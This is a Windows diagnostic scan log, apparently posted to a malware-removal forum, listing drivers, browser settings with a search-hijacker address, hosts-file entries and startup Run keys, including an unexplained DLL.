DRV:[b]64bit:[/b] - [2014/01/22 08:52:12 | 000,206,080 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssudserd.sys -- (ssudserd)
DRV:[b]64bit:[/b] - [2013/08/22 13:40:24 | 000,040,664 | ---- | M] (The OpenVPN Project) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\tap0901.sys -- (tap0901)
DRV:[b]64bit:[/b] - [2013/05/19 09:02:50 | 000,039,168 | ---- | M] (Scarlet.Crush Productions) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ScpVBus.sys -- (ScpVBus)
DRV:[b]64bit:[/b] - [2013/04/09 10:42:06 | 000,006,144 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\t_mouse.sys -- (t_mouse.sys)
DRV:[b]64bit:[/b] - [2013/03/19 17:11:00 | 000,034,816 | ---- | M] (TPMX Electronics Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\pelusblf.sys -- (pelusblf)
DRV:[b]64bit:[/b] - [2012/12/24 15:45:48 | 000,027,256 | ---- | M] (IVT Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IvtBtBus.sys -- (IvtBtBUs)
DRV:[b]64bit:[/b] - [2012/12/24 15:45:48 | 000,027,256 | ---- | M] (IVT Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IvtBtBus.sys -- (IvtAudioBusSrv)
DRV:[b]64bit:[/b] - [2012/12/24 15:42:26 | 000,031,480 | ---- | M] (IVT Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btnetBus.sys -- (IvtPanBusSrv)
DRV:[b]64bit:[/b] - [2012/11/28 17:08:08 | 000,023,040 | ---- | M] (TPMX Electronics Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\PELMOUSE.SYS -- (pelmouse)
DRV:[b]64bit:[/b] - [2012/08/28 10:16:04 | 001,577,792 | ---- | M] (Realtek Semiconductor Corporation ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\netn150ma.sys -- (netn150ma)
DRV:[b]64bit:[/b] - [2011/09/09 14:24:54 | 003,567,232 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\snp2uvc.sys -- (SNP2UVC)
DRV:[b]64bit:[/b] - [2011/07/22 17:26:56 | 000,014,928 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS -- (SASDIFSV)
DRV:[b]64bit:[/b] - [2011/07/12 22:55:18 | 000,012,368 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS -- (SASKUTIL)
DRV:[b]64bit:[/b] - [2010/03/25 10:05:16 | 000,046,776 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NANMp50.sys -- (NANMp50)
DRV:[b]64bit:[/b] - [2010/03/25 10:05:10 | 000,045,752 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NANSp50.sys -- (NANSp50)
DRV:[b]64bit:[/b] - [2008/12/30 10:59:02 | 000,116,224 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ewusbfake.sys -- (hwusbfake)
DRV:[b]64bit:[/b] - [2008/12/13 10:28:20 | 000,116,864 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ewusbmdm.sys -- (hwdatacard)
DRV:[b]64bit:[/b] - [2008/01/28 12:16:22 | 000,035,840 | ---- | M] () [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\WLNdis50.sys -- (WLNdis50)
DRV - [2018/12/31 11:17:23 | 000,048,960 | ---- | M] (CPUID) [Kernel | On_Demand | Running] -- C:\Windows\Temp\cpuz143\cpuz143_x64.sys -- (cpuz143)
DRV - [2018/07/07 22:22:03 | 000,048,656 | ---- | M] (Wellbia.com Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\xhunter1.sys -- (xhunter1)
DRV - [2018/05/23 09:09:55 | 000,269,408 | ---- | M] (Bluestack System Inc. ) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\BlueStacks\BstkDrv.sys -- (BstkDrv)
DRV - [2018/05/02 18:12:11 | 000,270,608 | ---- | M] (BigNox Corporation) [Kernel | System | Running] -- C:\Program Files (x86)\Bignox\BigNoxVM\RT\YSDrv.sys -- (YSDrv)
DRV - [2018/01/10 19:51:12 | 000,040,328 | -H-- | M] (IObit.com) [Kernel | On_Demand | Running] -- C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win10_amd64\IURegProcessFilter.sys -- (IURegProcessFilter)
DRV - [2017/09/29 14:40:59 | 000,040,448 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\System32\DriverStore\FileRepository\compositebus.inf_amd64_9c1fb8f4db31c348\CompositeBus.sys -- (CompositeBus)
DRV - [2017/08/04 07:44:50 | 000,022,912 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\xspirit.sys -- (xspirit)
DRV - [2017/07/19 00:56:28 | 000,024,056 | ---- | M] (IObit) [Kernel | On_Demand | Running] -- C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\Monitor_win10_x64.sys -- (iobit_monitor_server)
DRV - [2017/06/06 04:18:56 | 000,039,904 | -H-- | M] (IObit.com) [File_System | On_Demand | Running] -- C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win10_amd64\IUFileFilter.sys -- (IUFileFilter)
DRV - [2017/04/14 18:22:50 | 000,027,552 | ---- | M] (REALiX(tm)) [Kernel | System | Running] -- C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS -- (HWiNFO32)
DRV - [2017/03/06 00:22:52 | 000,039,288 | ---- | M] (IObit.com) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win10_amd64\IMFDownProtect.sys -- (IMFDownProtect)
DRV - [2017/02/16 04:15:30 | 000,052,792 | ---- | M] (IObit.com) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win10_amd64\RegFilter.sys -- (RegFilter)
DRV - [2017/02/16 04:15:26 | 000,033,600 | ---- | M] (IObit.com) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win10_amd64\IMFForceDelete.sys -- (IMFForceDelete)
DRV - [2017/02/16 04:15:24 | 000,040,440 | ---- | M] (IObit) [File_System | On_Demand | Stopped] -- C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win10_amd64\IMFFilter.sys -- (IMFFilter)
DRV - [2016/11/04 08:16:36 | 000,037,688 | ---- | M] (GlarySoft Ltd) [File_System | On_Demand | Stopped] -- C:\Program Files (x86)\Glarysoft\Malware Hunter\Native\winxp_x64\GUMHFilter.sys -- (GUMHFilters)


[color=#E56717]========== Standard Registry (All) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = [binary data]
IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Extensions Off Page = about:NoAdd-ons
IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\System32\blank.htm
IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Security Risk Page = about:SecurityRisk
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = [binary data]
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Extensions Off Page = about:NoAdd-ons
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Security Risk Page = about:SecurityRisk
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
IE - HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
IE - HKU\S-1-5-19\..\URLSearchHook: {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - C:\Windows\SysWOW64\ieframe.dll (Microsoft Corporation)
IE - HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
IE - HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
IE - HKU\S-1-5-20\..\URLSearchHook: {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - C:\Windows\SysWOW64\ieframe.dll (Microsoft Corporation)
IE - HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\system32\blank.htm
IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkGStHC4wmTIB37HCPZ1GdCdXdKu8clG06tlGzZyQkscqDkql5BZuqvu9E19opFQ4k-GvBXIaCLYSKtRivhV7burPor2GP6mBJtJfvV7uKHW08PHnIOr79fycoUJy60jNBKzRSlRl61341yk2eMMEC5koJbl0TEXlgQoQ4RX8A,,&q={searchTerms}
IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkGStHC4wmTIB37HCPZ1GdCdXdKu8clG06tlGzZyQkscqDkql5BZuqvu9E19opFQ4k-GvBXIaCLYSKtRivhV7burPor2GP6mBJtJfvV7uKHW08PHnIOr79fycoUJy60jNBKzRSlRl61341yk2eMMEC5koJbl0TEXlgQoQ4RX8A,,&q={searchTerms}
IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/fr-fr/?ocid=iehp
IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = fr-FR,fr;q=0.8,en-US;q=0.5,en;q=0.3
IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = BE D7 9B C6 8F 56 D1 01 [binary data]
IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page_TIMESTAMP = DC 93 19 2B 86 56 D1 01 [binary data]
IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Internet Explorer\Main,SyncHomePage Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy = Reg Error: Value error.
IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxkGStHC4wmTIB37HCPZ1GdCdXdKu8clG06tlGzZyQkscqDkql5BZuqvu9E19opFQ4k-GvBXIaCLYSKtRivhV7burPor2GP6mBJtJfvV7uKHW08PHnIOr79fycoUJy60jNBKzRSlRl61341yk2eMMEC5koJbl0TEXlgQoQ4RX8A,,&q={searchTerms}
IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\..\URLSearchHook: {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - C:\Windows\SysWOW64\ieframe.dll (Microsoft Corporation)
IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\..\SearchScopes,DefaultScope = {2f23ab71-4ac6-41f2-a955-ea576e553146}
IE - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.countryCode: "FR"
FF - prefs.js..browser.search.defaultenginename: "Bing Search Engine"
FF - prefs.js..browser.search.region: "FR"
FF - prefs.js..browser.search.selectedEngine: "Bing Search Engine"
FF - prefs.js..browser.startup.homepage: "https://www.google.com/"


FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_101.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_101.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=11.144.2: C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=11.144.2: C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3528.0331: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.0: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.2.1: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.2.4: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.2.5.1: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.2.6: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll (Adobe Systems)
FF - HKLM\Software\MozillaPlugins\adobe.com/AdobeExManDetect: File not found
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Thinkcentre\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

64bit-FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 64.0\extensions\\Components: C:\PROGRAM FILES (X86)\MOZILLA FIREFOX\COMPONENTS
64bit-FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 64.0\extensions\\Plugins: C:\PROGRAM FILES (X86)\MOZILLA FIREFOX\PLUGINS
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\arthurj8283@gmail.com: C:\Users\Thinkcentre\AppData\Roaming\Mozilla\Firefox\Profiles\itpic4cv.default\extensions\arthurj8283@gmail.com
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 64.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 64.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins

[2018/08/07 12:19:25 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\Extensions
[2018/08/07 12:19:27 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\SystemExtensionsDev
[2018/11/23 23:18:14 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\Firefox\Profiles\1bejbwmo.default\browser-extension-data
[2018/12/30 19:26:51 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\Firefox\Profiles\1bejbwmo.default\browser-extension-data\@hoxx-vpn
[2018/12/30 19:18:37 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\Firefox\Profiles\1bejbwmo.default\browser-extension-data\firefox@tampermonkey.net
[2018/12/30 19:48:24 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\Firefox\Profiles\1bejbwmo.default\browser-extension-data\jid1-NIfFY2CA8fy1tg@jetpack
[2018/12/30 19:26:50 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\Firefox\Profiles\1bejbwmo.default\extensions
[2018/12/30 19:26:49 | 001,352,000 | ---- | M] () (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\firefox\profiles\1bejbwmo.default\extensions\@hoxx-vpn.xpi
[2018/09/23 18:12:16 | 001,320,439 | ---- | M] () (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\firefox\profiles\1bejbwmo.default\extensions\firefox@tampermonkey.net.xpi
[2018/12/26 11:37:28 | 001,679,002 | ---- | M] () (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\firefox\profiles\1bejbwmo.default\extensions\jid1-NIfFY2CA8fy1tg@jetpack.xpi
[2018/08/07 12:22:54 | 000,281,088 | ---- | M] () (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\firefox\profiles\1bejbwmo.default\extensions\{6c7508bb-bf74-4b04-b41d-8d11872b0538}.xpi
[2018/12/26 11:37:28 | 000,049,869 | ---- | M] () (No name found) -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\firefox\profiles\1bejbwmo.default\features\{09b2a17e-d9c0-419c-87cc-b0ba65f4a72c}\fxmonitor@mozilla.org.xpi
[2018/12/24 10:59:13 | 000,001,427 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Roaming\mozilla\firefox\profiles\1bejbwmo.default\searchplugins\bing-lavasoft-ff59.xml

[color=#E56717]========== Chrome ==========[/color]

CHR - Extension: No name found = C:\Users\Thinkcentre\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\
CHR - Extension: No name found = C:\Users\Thinkcentre\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\
CHR - Extension: No name found = C:\Users\Thinkcentre\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\
CHR - Extension: No name found = C:\Users\Thinkcentre\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\
CHR - Extension: No name found = C:\Users\Thinkcentre\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\
CHR - Extension: No name found = C:\Users\Thinkcentre\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.7_1\
CHR - Extension: No name found = C:\Users\Thinkcentre\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom\3.36.0_0\
CHR - Extension: No name found = C:\Users\Thinkcentre\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.4_0\
CHR - Extension: No name found = C:\Users\Thinkcentre\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\
CHR - Extension: No name found = C:\Users\Thinkcentre\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7118.1015.0.0_0\

O1 HOSTS File: ([2018/12/26 11:41:59 | 000,023,167 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 down.baidu2016.com
O1 - Hosts: 127.0.0.1 123.sogou.com
O1 - Hosts: 127.0.0.1 www.czzsyzgm.com
O1 - Hosts: 127.0.0.1 www.czzsyzxl.com
O1 - Hosts: 127.0.0.1 www.mirillis.com
O1 - Hosts: 127.0.0.1 s0ft4pc.com
O1 - Hosts: 127.0.0.1 serwer2.paka-service.com
O1 - Hosts:
O1 - Hosts: 127.0.0.1 v1.ff.avast.com
O1 - Hosts: 127.0.0.1 vlcproxy.ff.avast.com
O1 - Hosts: 127.0.0.1 wepcdisplaysystem.com
O1 - Hosts: 127.0.0.1 wepcanalyticsystem.com
O1 - Hosts: 127.0.0.1 healthydownload.com
O1 - Hosts: 127.0.0.1 leading2download.com
O1 - Hosts: 127.0.0.1 dwl0.wizzlabs.com
O1 - Hosts: 127.0.0.1 dwl1.wizzlabs.com
O1 - Hosts: 127.0.0.1 wemsofts.com
O1 - Hosts:
O1 - Hosts: 127.0.0.1 v1.ff.avast.com
O1 - Hosts: 127.0.0.1 vlcproxy.ff.avast.com
O1 - Hosts: 127.0.0.1 gf.tools.avast.com
O1 - Hosts: 127.0.0.1 pair.ff.avast.com
O1 - Hosts: 127.0.0.1 ipm-provider.ff.avast.com
O1 - Hosts: 127.0.0.1 ipm-provider.ff.avast.com
O1 - Hosts: 127.0.0.1 ipm-provider.ff.avast.com
O1 - Hosts: 526 more lines...
O2:[b]64bit:[/b] - BHO: (ExplorerWnd Helper) - {10921475-03CE-4E04-90CE-E2E7EF20C814} - C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll (IObit)
O2 - BHO: (no name) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - No CLSID value found.
O2 - BHO: (no name) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - No CLSID value found.
O4:[b]64bit:[/b] - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:[b]64bit:[/b] - HKLM..\Run: [AdobeGCInvoker-1.0] C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe (Adobe Systems, Incorporated)
O4:[b]64bit:[/b] - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvLaunch.exe (AVAST Software)
O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\WINDOWS\SysNative\hkcmd.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\WINDOWS\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [MouseDriver] C:\WINDOWS\SysNative\TiltWheelMouse.exe (Pixart Imaging Inc)
O4:[b]64bit:[/b] - HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)
O4:[b]64bit:[/b] - HKLM..\Run: [SecurityHealth] C:\Program Files\Windows Defender\MSASCuiL.exe (Microsoft Corporation)
O4 - HKLM..\Run: [Adobe Creative Cloud] C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [IObit Malware Fighter] C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe (IObit)
O4 - HKLM..\Run: [MalTray] C:\Program Files (x86)\Glarysoft\Malware Hunter\mhtray.exe (Glarysoft Ltd)
O4 - HKLM..\Run: [OpwareSE4] C:\Program Files (x86)\ScanSoft\OmniPageSE4\OpwareSE4.exe (Nuance Communications, Inc.)
O4 - HKLM..\Run: [SSBkgdUpdate] C:\Program Files (x86)\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe (Nuance Communications, Inc.)
O4 - HKLM..\Run: [StartCCC] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe (Advanced Micro Devices, Inc.)
O4 - HKLM..\Run: [uni mouse driver] C:\Program Files (x86)\Hama Mouse Assistant\mouse_driver.exe ()
O4 - HKU\S-1-5-19..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [Chromium] c:\users\thinkcentre\appdata\local\chromium\application\chrome.exe (The Chromium Authors)
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [Dashlane] "C:\Users\Thinkcentre\AppData\Roaming\Dashlane\Dashlane.exe" autoLaunchAtStartup File not found
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [DashlanePlugin] "C:\Users\Thinkcentre\AppData\Roaming\Dashlane\DashlanePlugin.exe" ws File not found
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [dgkege] C:\Users\Thinkcentre\AppData\Local\dgkege.dll ()
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [Discord] C:\Users\Thinkcentre\AppData\Local\Discord\app-0.0.301\Discord.exe (Discord Inc.)
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [EpicGamesLauncher] B:\fortnite\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe (Epic Games, Inc.)
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [gtarcade] "C:\Users\Thinkcentre\AppData\Local\Gtarcade\app\gtarcade.exe" /game_id=312 /startgame=TGVhZ3VlIG9mIEFuZ2VscyBJSUk= File not found
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [Parsec.App.0] C:\Users\Thinkcentre\AppData\Roaming\Parsec\electron\parsec.exe (Parsec Cloud, Inc.)
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [RazerCortex] B:\Razer Cortex\CortexLauncher.exe (Razer Inc.)
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [Skype for Desktop] C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Technologies S.A.)
O4 - HKU\S-1-5-21-3272019039-2937534083-3055032403-1000..\Run: [Spotify] C:\Users\Thinkcentre\AppData\Roaming\Spotify\Spotify.exe (Spotify Ltd)
